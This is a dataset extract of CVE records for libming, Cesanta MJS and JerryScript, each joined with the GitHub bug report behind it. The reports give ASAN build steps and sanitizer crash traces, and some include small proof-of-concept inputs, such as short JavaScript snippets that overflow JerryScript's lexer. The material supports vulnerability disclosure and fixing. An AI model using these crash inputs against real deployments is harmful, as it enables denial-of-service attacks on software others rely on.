root@2413df779df0:~/compiler1804/libming-ming-0_4_8/obj-bc/bin# ./swftophp_asan libming_0-4-8_swftophp_invalid-memory-read_decompile1238.swf
header indicates a filesize of 4278191411 but filesize is 166
<?php
$m = new SWFMovie();
ming_setscale(1.0);
/* Note: using v5+ syntax for script blocks (original SWF file version was 4)! */
$m->setRate(64.855469);
$m->setDimension(66, 327);
/* Note: xMin and/or yMin are not 0! */
$m->setFrames(7440);
Stream out of sync after parse of blocktype 24 (SWF_PROTECT). 124 but expecting 58.
/* SWF_PROTECT */
$m->protect("\tJ�A�\n�=�b��h"�BAH���CU���!�����М{/��R���z��W:�6$QSՖ�;owf�0]x�\r�������\)���
��Qp(#}�m�\_");
Stream out of sync after parse of blocktype 9 (SWF_SETBACKGROUNDCOLOR). 63 but expecting 119.
/* SWF_SETBACKGROUNDCOLOR */
$m->setBackground(0x2f, 0xed, 0xd1);
Stream out of sync after parse of blocktype 11 (SWF_DEFINETEXT). 165 but expecting 125.
/* SWF_DEFINETEXT */
$character24412 = new SWFText(1);
$character24412->setFont($f392);
$character24412->setHeight(30910);
$character24412->setColor(0x79, 0x9d, 0xb2);
$character24412->moveTo(0, -15327);
$character24412->addString("X");
Failed to find branch target!!!
Looking for: -28887
Stream out of sync after parse of blocktype 12 (SWF_DOACTION). 138 but expecting 134.
/* SWF_DOACTION */
AddressSanitizer:DEADLYSIGNAL
=================================================================
==60499==ERROR: AddressSanitizer: SEGV on unknown address 0x601fffffffb0 (pc 0x000000502876 bp 0x7ffe6a2faa50 sp 0x7ffe6a2faa50 T0)
==60499==The signal is caused by a READ memory access.
#0 0x502876 in stackVal /root/compiler1804/libming-ming-0_4_8/util/decompile.c:1238:41
#1 0x4fe03d in decompileIF /root/compiler1804/libming-ming-0_4_8/util/decompile.c:2395:7
#2 0x4facdc in decompileAction /root/compiler1804/libming-ming-0_4_8/util/decompile.c:3242:10
#3 0x501b27 in decompileActions /root/compiler1804/libming-ming-0_4_8/util/decompile.c:3401:6
#4 0x503b31 in decompile5Action /root/compiler1804/libming-ming-0_4_8/util/decompile.c:3423:2
#5 0x4f7865 in outputSWF_DOACTION /root/compiler1804/libming-ming-0_4_8/util/outputscript.c:1548:29
#6 0x4f72ac in outputBlock /root/compiler1804/libming-ming-0_4_8/util/outputscript.c:2079:4
#7 0x4f9d21 in readMovie /root/compiler1804/libming-ming-0_4_8/util/main.c:277:4
#8 0x4f984d in main /root/compiler1804/libming-ming-0_4_8/util/main.c:350:2
#9 0x7f6f2645dc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
#10 0x41b8d9 in _start (/root/compiler1804/libming-ming-0_4_8/obj-bc/bin/swftophp_asan+0x41b8d9)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/compiler1804/libming-ming-0_4_8/util/decompile.c:1238:41 in stackVal
==60499==ABORTING
``` | Invalid memory read in stackVal() at decompile.c:1238 | https://api.github.com/repos/libming/libming/issues/268/comments | 0 | 2023-03-21T06:53:51Z | 2023-03-21T06:53:51Z | https://github.com/libming/libming/issues/268 | 1,633,325,057 | 268 | 5,101 |
CVE-2023-30085 | 2023-05-09T16:15:14.470 | Buffer Overflow vulnerability found in Libming swftophp v.0.4.8 allows a local attacker to cause a denial of service via the cws2fws function in util/decompile.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/libming/libming/issues/267"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/libming/libming/issues/267"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*",
"matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"120"
] | 120 | https://github.com/libming/libming/issues/267 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"libming",
"libming"
] | Allocation size overflow in the latest version of libming at function cws2fws in util/main.c:111.
## Environment
Ubuntu 18.04, 64 bit
libming 0.4.8
## Steps to reproduce
1. download file
```
wget https://github.com/libming/libming/archive/refs/tags/ming-0_4_8.tar.gz
tar -zxvf ming-0_4_8.tar.gz
```
2. compile libming with ASAN
```
cd libming-ming-0_4_8
./autogen.sh
export FORCE_UNSAFE_CONFIGURE=1
export LLVM_COMPILER=clang
CC=wllvm CXX=wllvm++ CFLAGS="-g -O0 -fcommon -Wno-error" ./configure --prefix=`pwd`/obj-bc --with-php-config=/usr/bin/php-config7.2 --enable-static --disable-shared
make
make install
cd obj-bc/bin/
extract-bc swftophp
clang -fsanitize=address -lz -lm swftophp.bc -o swftophp_asan
```
3. command for reproducing the error
```
./swftophp_asan poc
```
Download poc:
[libming_0-4-8_swftophp_allocation-size-overflow_main111.zip](https://github.com/libming/libming/files/11025537/libming_0-4-8_swftophp_allocation-size-overflow_main111.zip)
## ASAN report
```
root@2413df779df0:~/compiler1804/libming-ming-0_4_8/obj-bc/bin# ./swftophp_asan libming_0-4-8_swftophp_allocation-size-overflow_main111.swf
=================================================================
==60493==ERROR: AddressSanitizer: requested allocation size 0xffffffffff000533 (0xffffffffff001538 after adjustments for alignment, red zones etc.) exceeds maximum supported size of 0x10000000000 (thread T0)
#0 0x4ae288 in realloc /root/LLVM/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:164
#1 0x4f9334 in cws2fws /root/compiler1804/libming-ming-0_4_8/util/main.c:111:15
#2 0x4f99dd in readMovieHeader /root/compiler1804/libming-ming-0_4_8/util/main.c:198:18
#3 0x4f97ee in main /root/compiler1804/libming-ming-0_4_8/util/main.c:346:5
#4 0x7f6a64b67c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
==60493==HINT: if you don't care about these errors you may set allocator_may_return_null=1
SUMMARY: AddressSanitizer: allocation-size-too-big /root/LLVM/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:164 in realloc
==60493==ABORTING
```
| Allocation size overflow in cws2fws() at main.c:111 | https://api.github.com/repos/libming/libming/issues/267/comments | 0 | 2023-03-21T06:50:17Z | 2023-03-21T06:50:17Z | https://github.com/libming/libming/issues/267 | 1,633,322,109 | 267 | 5,102 |
CVE-2023-30087 | 2023-05-09T16:15:14.547 | Buffer Overflow vulnerability found in Cesanta MJS v.1.26 allows a local attacker to cause a denial of service via the mjs_mk_string function in mjs.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/244"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/244"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cesanta:mjs:1.26:*:*:*:*:*:*:*",
"matchCriteriaId": "25C97820-C80A-41CE-B510-F292D2AF665E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/cesanta/mjs/issues/244 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"cesanta",
"mjs"
] | Heap buffer overflow in mjs at function mjs_mk_string in mjs.c:13671.
## Environment
Ubuntu 18.04, 64 bit
## Steps to reproduce
1. download file
```
git clone https://github.com/cesanta/mjs.git mjs
cd mjs
git checkout 9eae0e6
```
2. compile libming with ASAN
```
clang -fsanitize=address mjs.c -o mjs_asan
```
3. command for reproducing the error
```
./mjs_asan -f poc
```
Download poc:
[mjs_heap-buffer-overflow_mjs13671.zip](https://github.com/cesanta/mjs/files/11038286/mjs_heap-buffer-overflow_mjs13671.zip)
## ASAN report
```
> ./mjs_asan -f mjs_heap-buffer-overflow_mjs13671
=================================================================
==23460==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60800000007d at pc 0x00000046b929 bp 0x7fff87d05cd0 sp 0x7fff87d05480
READ of size 94 at 0x60800000007d thread T0
#0 0x46b928 in __interceptor_strlen.part.0 /home/fzz/Desktop/STFGFuzz/LLVM/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:372:5
#1 0x510fbf in mjs_mk_string /root/compiler1804/aflgo_dataset/mjs-issues-78/mjs.c:13671:35
#2 0x5328d2 in frozen_cb /root/compiler1804/aflgo_dataset/mjs-issues-78/mjs.c:11870:13
#3 0x5162ac in parse_string /root/compiler1804/aflgo_dataset/mjs-issues-78/mjs.c:5884:9
#4 0x51597c in parse_value /root/compiler1804/aflgo_dataset/mjs-issues-78/mjs.c:5970:7
#5 0x516bb3 in parse_array /root/compiler1804/aflgo_dataset/mjs-issues-78/mjs.c:5936:9
#6 0x515a94 in parse_value /root/compiler1804/aflgo_dataset/mjs-issues-78/mjs.c:5976:7
#7 0x503145 in doit /root/compiler1804/aflgo_dataset/mjs-issues-78/mjs.c:6058:10
#8 0x50077b in json_walk /root/compiler1804/aflgo_dataset/mjs-issues-78/mjs.c:6434:3
#9 0x532618 in mjs_json_parse /root/compiler1804/aflgo_dataset/mjs-issues-78/mjs.c:11963:14
#10 0x50a501 in mjs_op_json_parse /root/compiler1804/aflgo_dataset/mjs-issues-78/mjs.c:12012:5
#11 0x50e248 in mjs_execute /root/compiler1804/aflgo_dataset/mjs-issues-78/mjs.c:9541:11
#12 0x50c4ce in mjs_exec_internal /root/compiler1804/aflgo_dataset/mjs-issues-78/mjs.c:9758:5
#13 0x50c610 in mjs_exec_file /root/compiler1804/aflgo_dataset/mjs-issues-78/mjs.c:9781:11
#14 0x50fe4f in main /root/compiler1804/aflgo_dataset/mjs-issues-78/mjs.c:12051:13
#15 0x7f5460494082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
#16 0x41c3cd in _start (/home/fzz/Desktop/STFGFuzz/Programs/mjs-issues-78/seeds_crash/mjs_asan+0x41c3cd)
0x60800000007d is located 0 bytes to the right of 93-byte region [0x608000000020,0x60800000007d)
allocated by thread T0 here:
#0 0x4c1f3f in malloc /home/fzz/Desktop/STFGFuzz/LLVM/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145:3
#1 0x53287b in frozen_cb /root/compiler1804/aflgo_dataset/mjs-issues-78/mjs.c:11868:36
#2 0x5162ac in parse_string /root/compiler1804/aflgo_dataset/mjs-issues-78/mjs.c:5884:9
#3 0x51597c in parse_value /root/compiler1804/aflgo_dataset/mjs-issues-78/mjs.c:5970:7
#4 0x516bb3 in parse_array /root/compiler1804/aflgo_dataset/mjs-issues-78/mjs.c:5936:9
#5 0x515a94 in parse_value /root/compiler1804/aflgo_dataset/mjs-issues-78/mjs.c:5976:7
#6 0x503145 in doit /root/compiler1804/aflgo_dataset/mjs-issues-78/mjs.c:6058:10
#7 0x50077b in json_walk /root/compiler1804/aflgo_dataset/mjs-issues-78/mjs.c:6434:3
#8 0x532618 in mjs_json_parse /root/compiler1804/aflgo_dataset/mjs-issues-78/mjs.c:11963:14
#9 0x50a501 in mjs_op_json_parse /root/compiler1804/aflgo_dataset/mjs-issues-78/mjs.c:12012:5
#10 0x50e248 in mjs_execute /root/compiler1804/aflgo_dataset/mjs-issues-78/mjs.c:9541:11
#11 0x50c4ce in mjs_exec_internal /root/compiler1804/aflgo_dataset/mjs-issues-78/mjs.c:9758:5
#12 0x50c610 in mjs_exec_file /root/compiler1804/aflgo_dataset/mjs-issues-78/mjs.c:9781:11
#13 0x50fe4f in main /root/compiler1804/aflgo_dataset/mjs-issues-78/mjs.c:12051:13
#14 0x7f5460494082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/fzz/Desktop/STFGFuzz/LLVM/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:372:5 in __interceptor_strlen.part.0
Shadow bytes around the buggy address:
0x0c107fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c107fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c107fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c107fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c107fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c107fff8000: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00[05]
0x0c107fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c107fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c107fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c107fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c107fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==23460==ABORTING
``` | Heap buffer overflow in mjs_mk_string() at mjs.c:13671 | https://api.github.com/repos/cesanta/mjs/issues/244/comments | 0 | 2023-03-22T09:15:39Z | 2023-03-22T09:15:39Z | https://github.com/cesanta/mjs/issues/244 | 1,635,358,781 | 244 | 5,103 |
CVE-2023-30088 | 2023-05-09T16:15:14.583 | An issue found in Cesanta MJS v.1.26 allows a local attacker to cause a denial of service via the mjs_execute function in mjs.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/243"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/243"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cesanta:mjs:1.26:*:*:*:*:*:*:*",
"matchCriteriaId": "25C97820-C80A-41CE-B510-F292D2AF665E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"119"
] | 119 | https://github.com/cesanta/mjs/issues/243 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"cesanta",
"mjs"
] | Invalid memory read in mjs at function mjs_execute in mjs.c:9320.
## Environment
Ubuntu 18.04, 64 bit
## Steps to reproduce
1. download file
```
git clone https://github.com/cesanta/mjs.git mjs
cd mjs
git checkout d6c06a6
```
2. compile libming with ASAN
```
clang -fsanitize=address mjs.c -o mjs_asan
```
3. command for reproducing the error
```
./mjs_asan -f poc
```
Download poc:
[mjs_invalid-memory-read_mjs9320.zip](https://github.com/cesanta/mjs/files/11038279/mjs_invalid-memory-read_mjs9320.zip)
## ASAN report
```
> ./mjs_asan -f mjs_invalid-memory-read_mjs9320
AddressSanitizer:DEADLYSIGNAL
=================================================================
==23749==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000050e0d0 bp 0x7ffdec19de70 sp 0x7ffdec19dcb0 T0)
==23749==The signal is caused by a WRITE memory access.
==23749==Hint: address points to the zero page.
#0 0x50e0d0 in mjs_execute /root/compiler1804/aflgo_dataset/mjs-issues-57/mjs.c:9320:46
#1 0x50c2ce in mjs_exec_internal /root/compiler1804/aflgo_dataset/mjs-issues-57/mjs.c:9503:5
#2 0x50c410 in mjs_exec_file /root/compiler1804/aflgo_dataset/mjs-issues-57/mjs.c:9526:11
#3 0x50f8df in main /root/compiler1804/aflgo_dataset/mjs-issues-57/mjs.c:11783:13
#4 0x7fe50601e082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
#5 0x41c3cd in _start (/home/fzz/Desktop/STFGFuzz/Programs/mjs-issues-57/seeds_crash/mjs_asan+0x41c3cd)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/compiler1804/aflgo_dataset/mjs-issues-57/mjs.c:9320:46 in mjs_execute
==23749==ABORTING
``` | Invalid memory read in mjs_execute() at mjs.c:9320 | https://api.github.com/repos/cesanta/mjs/issues/243/comments | 1 | 2023-03-22T09:15:01Z | 2023-05-15T14:19:13Z | https://github.com/cesanta/mjs/issues/243 | 1,635,357,898 | 243 | 5,104 |
CVE-2023-31906 | 2023-05-10T15:15:10.187 | Jerryscript 3.0.0(commit 1a2c047) was discovered to contain a heap-buffer-overflow via the component lexer_compare_identifier_to_chars at /jerry-core/parser/js/js-lexer.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5066"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5066"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/jerryscript-project/jerryscript/issues/5066 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
Commit: https://github.com/jerryscript-project/jerryscript/commit/1a2c04763aba49f52b1537acd3730098c873511c
Version: v3.0.0
###### Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
###### Build steps
```sh
python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20
```
###### Test case
```javascript
// poc1.js
class C {#static async''
```
###### Execution steps & Output
```
$ ./jerryscript/build/bin/jerry poc1.js
=================================================================
==3572149==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf5500959 at pc 0x0839f1a4 bp 0xffbc0428 sp 0xffbc0420
READ of size 1 at 0xf5500959 thread T0
#0 0x839f1a3 in lexer_compare_identifier_to_chars jerryscript/jerry-core/parser/js/js-lexer.c:3297:9
#1 0x839f4c1 in lexer_compare_identifiers jerryscript/jerry-core/parser/js/js-lexer.c
#2 0x83b5a37 in parser_check_duplicated_private_field jerryscript/jerry-core/parser/js/js-parser-expr.c:416:9
#3 0x83a2c8c in parser_parse_class_body jerryscript/jerry-core/parser/js/js-parser-expr.c:701:9
#4 0x83a2c8c in parser_parse_class jerryscript/jerry-core/parser/js/js-parser-expr.c:1110:27
#5 0x83c9958 in parser_parse_statements jerryscript/jerry-core/parser/js/js-parser-statm.c:2787:9
#6 0x8284a25 in parser_parse_source jerryscript/jerry-core/parser/js/js-parser.c:2280:5
#7 0x8282c6f in parser_parse_script jerryscript/jerry-core/parser/js/js-parser.c:3326:38
#8 0x8129a7c in jerry_parse_common jerryscript/jerry-core/api/jerryscript.c:412:21
#9 0x8129697 in jerry_parse jerryscript/jerry-core/api/jerryscript.c:480:10
#10 0x83ea951 in jerryx_source_parse_script jerryscript/jerry-ext/util/sources.c:52:26
#11 0x83eac11 in jerryx_source_exec_script jerryscript/jerry-ext/util/sources.c:63:26
#12 0x812162c in main jerryscript/jerry-main/main-desktop.c:156:20
#13 0xf7bf3ed4 in __libc_start_main (/lib32/libc.so.6+0x1aed4)
#14 0x8078645 in _start (jerryscript/build/bin/jerry+0x8078645)
0xf5500959 is located 0 bytes to the right of 25-byte region [0xf5500940,0xf5500959)
allocated by thread T0 here:
#0 0x80efe65 in malloc (jerryscript/build/bin/jerry+0x80efe65)
#1 0x83ec157 in jerry_port_source_read jerryscript/jerry-port/common/jerry-port-fs.c:72:45
#2 0x83ea7ce in jerryx_source_parse_script jerryscript/jerry-ext/util/sources.c:33:28
#3 0x83eac11 in jerryx_source_exec_script jerryscript/jerry-ext/util/sources.c:63:26
#4 0x812162c in main jerryscript/jerry-main/main-desktop.c:156:20
#5 0xf7bf3ed4 in __libc_start_main (/lib32/libc.so.6+0x1aed4)
SUMMARY: AddressSanitizer: heap-buffer-overflow jerryscript/jerry-core/parser/js/js-lexer.c:3297:9 in lexer_compare_identifier_to_chars
Shadow bytes around the buggy address:
0x3eaa00d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3eaa00e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3eaa00f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3eaa0100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3eaa0110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x3eaa0120: fa fa 00 00 04 fa fa fa 00 00 00[01]fa fa 00 00
0x3eaa0130: 00 fa fa fa 00 00 00 00 fa fa 00 00 04 fa fa fa
0x3eaa0140: 00 00 00 00 fa fa 00 00 03 fa fa fa 00 00 00 fa
0x3eaa0150: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00
0x3eaa0160: 00 fa fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa
0x3eaa0170: 00 00 00 00 fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==3572149==ABORTING
```
---
###### Test case+
```javascript
// poc2.js
class C {#static async*''
```
###### Execution steps & Output+
```
$ ./jerryscript/build/bin/jerry poc2.js
=================================================================
==3572558==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf540095a at pc 0x0839f1a4 bp 0xffe49808 sp 0xffe49800
READ of size 1 at 0xf540095a thread T0
#0 0x839f1a3 in lexer_compare_identifier_to_chars jerryscript/jerry-core/parser/js/js-lexer.c:3297:9
#1 0x839f4c1 in lexer_compare_identifiers jerryscript/jerry-core/parser/js/js-lexer.c
#2 0x83b5a37 in parser_check_duplicated_private_field jerryscript/jerry-core/parser/js/js-parser-expr.c:416:9
#3 0x83a2edb in parser_parse_class_body jerryscript/jerry-core/parser/js/js-parser-expr.c:728:9
#4 0x83a2edb in parser_parse_class jerryscript/jerry-core/parser/js/js-parser-expr.c:1110:27
#5 0x83c9958 in parser_parse_statements jerryscript/jerry-core/parser/js/js-parser-statm.c:2787:9
#6 0x8284a25 in parser_parse_source jerryscript/jerry-core/parser/js/js-parser.c:2280:5
#7 0x8282c6f in parser_parse_script jerryscript/jerry-core/parser/js/js-parser.c:3326:38
#8 0x8129a7c in jerry_parse_common jerryscript/jerry-core/api/jerryscript.c:412:21
#9 0x8129697 in jerry_parse jerryscript/jerry-core/api/jerryscript.c:480:10
#10 0x83ea951 in jerryx_source_parse_script jerryscript/jerry-ext/util/sources.c:52:26
#11 0x83eac11 in jerryx_source_exec_script jerryscript/jerry-ext/util/sources.c:63:26
#12 0x812162c in main jerryscript/jerry-main/main-desktop.c:156:20
#13 0xf7bc3ed4 in __libc_start_main (/lib32/libc.so.6+0x1aed4)
#14 0x8078645 in _start (jerryscript/build/bin/jerry+0x8078645)
0xf540095a is located 0 bytes to the right of 26-byte region [0xf5400940,0xf540095a)
allocated by thread T0 here:
#0 0x80efe65 in malloc (jerryscript/build/bin/jerry+0x80efe65)
